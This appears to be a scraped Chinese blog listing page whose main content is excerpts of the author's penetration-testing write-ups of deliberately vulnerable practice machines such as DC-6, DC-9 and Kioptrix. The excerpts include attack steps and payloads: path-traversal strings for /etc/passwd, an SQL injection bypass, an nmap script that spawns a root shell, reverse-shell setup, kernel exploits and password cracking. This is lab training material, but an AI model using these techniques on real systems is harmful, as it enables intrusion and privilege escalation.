自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 JOY靶机复现

从Ftp下载的directory文件中有个version_control文件,但是不知道文件内容,看是否可以用ProFTPd的拷贝漏洞将其内容拿到。发现了ProFTPd的版本是proftpd 1.3.5。将命令写入test,放到ftp的upload目录下。发现root用户无法登陆,登陆patrick用户。查看version_control文件。在github中找到一个漏洞,下载下来。发现有一个directory目录。点进去查看发现为ossec框架。设置靶机为NAT模式。生成交互式shell。

2024-08-19 08:57:39 249

原创 decoy靶机复现

使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。

2024-08-19 08:56:50 747

原创 sunset靶机复现

靶机IP为192.168.112.148。ls发现有一个backup文件,进行下载。将backup里的内容放到1.txt中。sudo -l查看免密操作。发现用户:sunset。靶机设置为NAT模式。在kali中进行破解。密码:cheer14。

2024-08-19 08:56:13 243

原创 Ted靶机设置

转化大写后8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918。尝试提交 ../../../../../../../../etc/passwd。尝试包含用来存储用户session的文件,从而获取shell。抓取一个有session的请求包,拿到session。靶机ip为192.168.112.144。尝试弱口令登陆,发现失败。监听成功,拿到shell。设置靶机为NAT模式。发现需要hash加密。发现存在文件包含漏洞。

2024-08-17 08:50:47 281

原创 DC-6靶机复现

echo "os.execute('/bin/bash')">demon.nse nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)打开Activity monitor,点击tools,输入lookup发现有回显。发现了 admin,mark,graham,sarah,jens几个用户名。发现Mark里面的things-to-do.txt。得到graham用户的密码GSo7isUM1D4。发现root用户的nmap操作免密。BP抓包,构造反弹shell。使用webscan扫描。

2024-08-17 08:50:05 283

原创 clamp靶机复现

字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php。进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas。在 /var/www/html 下看见important.pcapng文件,查看他。换个更大的字典,扫出来一个 /nt4stopc/ 目录。发现文件上传点,但是没有提交按钮,自己添加一个。kali生成反弹shell。发现有一个email信息。生成交互式shell。

2024-08-14 19:51:08 789

原创 DC-6靶机复现

echo "os.execute('/bin/bash')">demon.nse nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)打开Activity monitor,点击tools,输入lookup发现有回显。发现了 admin,mark,graham,sarah,jens几个用户名。发现Mark里面的things-to-do.txt。得到graham用户的密码GSo7isUM1D4。发现root用户的nmap操作免密。BP抓包,构造反弹shell。使用webscan扫描。

2024-08-14 19:49:10 227

原创 PumpkinFestival靶机复现

进入和token.txt同级的目录中继续遍历,发现了一个data.txt文件。之前发现的一个值Alohomora!发现secret中有一个token.txt文件。靶机ip为192.168.112.145。查看目录,发现一个token乱码文件。还发现了一个readme.html。查看源码,发现一串token值。发现token.txt文件。发现token.txt文件。查看类型发现是tar压缩包。发现了第五个token值。拼接token.txt。发现第二个token值。发现第三个token值。

2024-08-13 20:24:40 742

原创 Broken: Gallery靶机复现

靶机IP为192.168.112.142。sudo -l查看免密操作。尝试爆破ssh账号密码。靶机设置为NAT模式。查看后发现都没什么用。

2024-08-13 20:22:49 362

原创 Machine_Matrix靶机复现

crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric-sv -t k1ll0r@@ > pass.dic生成字典。表示可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位。cat /usr/share/crunch/charset.lst 查看范围。查看发现为brainfuck编码。双击Tab查看可以使用的命令。sudo -l查看免密操作。发现可以直接sudo su。密码:k1ll0r7n。设置靶机为NAT模式。

2024-08-12 19:10:44 344

原创 West-Wild-v1.1靶机复现

靶机IP为192.168.112.139。sudo -l发现all all。sudo -l发现没有免密操作。ls发现有一个flag文件。密码:kaizen+80。发现有一个wave共享。设置靶机为NAT模式。进行base64解码。

2024-08-12 19:09:37 304

原创 Hackademic.RTB1靶机复现

密码最后以为加密,使用MD5进行解密。使用bursuite进行暴力破解。测试发现不存在SQL注入。库名为wordpress。测试发现存在SQL注入。

2024-08-12 00:27:55 294

原创 DC-9靶机复现

file=../../../../../etc/knockd.conf进行敲门文件的访问。file=../../../../etc/passwd得到。靶机地址为192.168.112.130。对search.php抓包测试sql注入。密码:transorbital1。发现22端口服务已经打开。对80端口进行深入渗透。22端口处于关闭状态。发现管理员用户和密码。通过hydra来爆破。

2024-08-12 00:27:08 255

原创 WebDeveloper靶机复现

cd /var/www/html/ ,查看 wp-config.php 文件。在wireshark里面查看,发现wordpress的账户密码。密码:Te5eQg&4sBS!靶机ip为192.168.112.137。sudo -l查看发现没有免密操作。账号:webdeveloper。账号:webdeveloper。使用kali反弹shell。改成kali的ip进行监听。sudo -l查看免密操作。发现可以文件上传的地方。发现了数据库的账号密码。getshell成功。

2024-08-12 00:25:48 359

原创 unknowndevice64-V1.0靶机复现

发现有一个key_is_h1dd3n.jpg图片。访问192.168.112.136:31337。发现需要密码,文件名字说密码是h1dd3n。靶机ip为192.168.112.136。破解好后查看,发现brainfuck加密。只开了一个31337端口,进行扫描。将图片下载下来放在kali进行破解。内容为ud64:1M!发现可以进行syssud64的操作。发现提示藏着密码,对图片解码。双击Tab查看可执行的命令。sudo -l查看免密操作。设置靶机为NAT模式。发现是rbash限制。

2024-08-12 00:24:59 315

原创 DC-2靶机复现

-enumerate u枚举用户(记得kali中也将hosts文件绑定)flag中提醒我切换用户,我们切到jerry用户。发现了三个用户:admin jerry tom。# 利用bash_cmds自定义一个shell。发现echo可以使用,进行 rbash 绕过。flag提示可以进入第二个入口,尝试ssh。靶机IP为192.168.112.135。发现无法访问,在hosts中添加。点击flag,发现flag1。使用tom用户连接,连接成功。再次访问,发现访问成功。设置靶机为NAT模式。

2024-08-12 00:24:10 294

原创 W34KN3SS靶机复现

检查文件代码时,发现了一个python的编译文件,进行下载查看。因为知道了openssl的版本,去msf中寻找对应的exp。hosts文件中 绑定ip和weakness.jth。在kali中也绑定host,方便后续使用。发现需要很多密钥,在host文件中绑定。ls查看文件发现有一个user.txt。设置为nat网卡模式,查看mac地址。发现是加密的ssh公钥,尝试解密失败。发现5622.txt适合,下载下来。试图上传一个木马,发现不行。发现openssl的版本。再次查看发现有任何权限。

2024-08-12 00:23:23 442

原创 basic_pentesting_2靶机复现

john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt(我的rockyou.txt我放到桌面上了)K说 J 这个用户是一个弱口令,使用kali中的enum4linux工具进行扫描。cat id_rsa,将私钥里的内容复制到kali上。前面提到存在哈希值相关,将私钥破解为hash。因为存在22端口开放ssh,选择ssh爆破。sudo -l查看发现没有免密操作。输入密码发现可以sudo su。suodo -l发现需要密码。发现存在pass.bak。

2024-08-08 21:26:12 401

原创 BlackMarket靶机复现

因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。

2024-08-07 22:04:21 848

原创 Bob_v1.0.1靶机复现

发现里面说有一个没有保护的shell,电子邮件中包含该shell。有回显,尝试注入一句话木马,发现有的命令不能够执行。切换到家目录,发现有四个用户,切换到bob用户中。之前扫描端口的时候发现ssh开放端口是25468。靶机IP为192.168.112.169。发现可以执行所有操作,直接sudo su。因为免密操作发现有ssh功能,尝试登陆。发现了一个可执行的notes.sh文件。发现还是得从命令执行的地方找突破口。发现首字母都是大写,可能是藏头诗。发现有一个疑似存放密码的地方。sudo -l查看免密操作。

2024-08-07 22:02:41 277

原创 w1r3s-editable靶机复现

用同样的方法获得保存密码的shadow文件试试,结果发现了 root 、www-data、 w1r3s用户的密。发现可以创建数据库,但是不知道其账号密码,发现为Cuppa CMS框架,尝试寻找其EXP。发现是wordpress登录页面,尝试admin admin 弱口令登录。在文件中发现了 w1r3s 用户,去想办法获取密码。发现什么都可以操作,直接sudo su。80端口开放,进行目录扫描。没什么信息,进行目录拼接。登录成功,但是页面无回显。账号:www-data。密码:www-data。

2024-08-06 14:51:47 230

原创 basic_pentesting_1靶机复现

为了方便大家查看,就不展示其他的了,没有什么有价值的地方,感兴趣的可以自己拼接看一下。search wp_admin 查看与wordpress登陆相关的exp进行利用。尝试使用弱口令登陆,账号admin密码admin,登陆成功。知道了账户名和密码,去msf中尝试getshell。run(这里我润出现了问题,重启了一下靶机就好了)先尝试账号密码登陆,发现居然成功了。因为有80端口开放,进行目录扫描。查看后发现为普通用户,需要提权。发现可以通过MD5解密的用户。修改网卡模式为NAT模式。

2024-08-05 21:41:41 273

原创 DerpNStink靶机复现

网页尝试拼接 Index of ftp://192.168.19.175/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/在反弹的shell中,进入tmp目录,从kali的web端wget下来cve-2021-4034-poc.c。dirb扫描发现了 http://derpnstink.local/weblog/wp-admin/cd ../../.. ---来到/var/www/html/weblog目录枚举信息!发现/webnotes/info.txt。

2024-08-05 21:40:43 566

原创 DepthB2R靶机复现

访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。

2024-08-02 20:37:12 295

原创 Dina-1-0-1靶机复现

解压发现需要密码,使用刚才nothing源码中的password字段尝试。set rhosts 192.168.7.140 Dina的IP。发现为后台为playsms,尝试使用msf进行getshell。密码继续用nothing中的password字段尝试。点击页面网址,没有发现什么有信息的地方。账户名应该就是刚才的touhid。尝试成功,密码为freedom。发现diana为该账号的密码。80端口开放,进行目录扫描。发现了password字段。发现存在账户名touhid。sudo -l查看免密操作。

2024-08-02 20:34:48 313

原创 evilscience靶机复现

因为只开放了ssh和http,尝试查看ssh日志。靶机IP为 192.168.112.150。靶机设置为NAT模式。发现存在文件包含漏洞。

2024-08-02 20:32:54 162

原创 zico2靶机复现

在/home/zico/wordpress/wp-config.php中读取到账号密码。在页面发现有一个Rename的选项,尝试改名将木马放在后台文件中进行执行。发现ssh登陆失败后,继续在数据库中进行操作,尝试写入webshell。创建表中字段,格式为text,为后续写入shell做准备。再次拼接访问/dbadmin/发现1.php文件已经存在。使用蚁剑连接,发现连接成功,成功拿到shell。在info中发现账号密码,进行MD5解密。发现没有什么有价值的东西,尝试目录拼接。密码:34kroot34。

2024-08-02 16:06:49 266

原创 Breach-2_final2.1靶机复现

到/usr/share/beef-xss/下查看config.yaml文件,;靶机设置为仅主机模式,该靶机特殊,IP固定为192.168.110.151。netstat -tunlpa发现靶机有一个一直在监听的2323端口。telnet连接,发现失败,看起来像是http服务,再次扫描端口。nmap再次扫描,果然发现存在8888端口的http服务。发现提示用户Peter,密码是inthesource。netstat -tunlpa发现有8888端口监听。输入之发现的admin,admin,登陆成功。

2024-08-02 16:02:28 974

原创 RickdiculouslyEasy靶机复现

现在只剩下60000端口了,扫描的时候发现写着reverse shell,说明存在反弹shell。对靶机进行设置将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。发现为一张图片,但是图片名字有password,尝试使用010 Editor查看。记得在扫描的时候发现有个9090端口,也是http,进行拼接查看。尝试进行匿名登录,账户为anonymous,密码为空,直接回车。发现里面有文件,但是下载不了,开启远程服务,在本机进行下载。发现需要密码,试了winter发现不对,暂时搁置。

2024-08-01 23:58:44 349

原创 FristiLeaks_1.3靶机复现

输入searchspoilt -m linux/local/40839.c /home/kali/Desktop下载。发现没有可拼接的页面,端口也只开放了一个80端口,只能尝试拼接页面上的字段,拼接 fristi。设置网卡为NAT模式,并且将网卡改为 08:00:27:A5:A6:76 ,否则访问不到。靶机输入wget http://kali的IP:8000/40839.c下载。发现拼接成功,出现了后台登录页面,但是不知道账号密码,查看源码。上传失败,只能上传 png,jpg,gif 格式的文件。

2024-08-01 23:57:35 416

原创 SkyTower靶机复现

发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。

2024-07-31 20:40:53 513 2

原创 21LTR.com_Scene1_2.120_v1.0靶机复现

查看/media/USB_1/Stuff/Keys下的id_rsa文件。将kali和虚拟机都设置为仅主机模式,网段都为192.168.2。使用telnet 192.168.2.120 10001连接。cd到ssh文件下,进行config文件编辑。ls查看有backup_log.php文件。ftp 192.168.2.120连接。密码:zg]E-b0]+8:(58G。输入账号密码发现连接失败。查看源码发现有账号密码。查看内容暂无有价值内容。读取etc/shdow。将文件保存到kali。发现root用户密码。

2024-07-31 00:06:06 299

原创 De-ICE_S1.120靶机复现

将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh。到/home/ccoffee/scripts路径下。将kali和靶机都设置为仅主机模式。因为ssh服务开启,尝试远程连接。发现存在免密getlogs.sh。点击Add product。输入发现存在反射型xss注入。查看mysql数据库的表。使用sqlmap查询。

2024-07-30 22:47:36 353

原创 KioptrixVM3靶机复现

输入searchspoilt -m linux/local/40839.c /home/kali/Desktop下载。靶机输入wget http://kali的IP:8000/40839.c下载。因为后台登录失败,所以尝试使用扫到的ssh端口进行连接。uname -a发现版本低于3.9,可以使用脏牛提权。因为有后台,大概率账号密码存在数据库中,查看数据库。发现该用户没权限使用,切换用户loneferret。发现http端口开放,进行目录扫描。发现存在参数,进行sql注入测试。测试成功,发现存在sql注入。

2024-07-30 21:38:53 658

原创 holynix靶机复现

输入 sudo mv /bin/tar /bin/tar.orgi。修改靶机的MAC地址为 00:0c:29:bc:05:de。使用 sudo -l 查看当前可执行的免sudo权限。在username和password里面输入单引号。出现sql报错语句,说明存在sql注入。将cookie中的uid改为2。在用户的家目录找到了上传的文件。查看当前用户,发现为低权限用户。发现靶机地址,并开放80端口。上传shell.tar.gz。将三个免密的权限随便改个名字。将提权的改为免密的名字。发现用户名和密码信息。

2024-07-30 20:06:23 359

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除